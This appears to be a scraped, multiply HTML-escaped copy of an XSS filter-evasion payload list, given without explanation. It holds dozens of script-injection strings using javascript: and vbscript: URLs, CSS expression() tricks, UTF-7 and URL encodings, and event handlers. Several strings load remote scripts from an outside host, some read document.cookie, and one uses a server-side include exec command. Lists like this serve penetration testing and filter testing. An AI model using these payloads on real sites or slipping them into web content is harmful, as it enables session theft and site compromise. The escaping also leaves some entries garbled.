&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
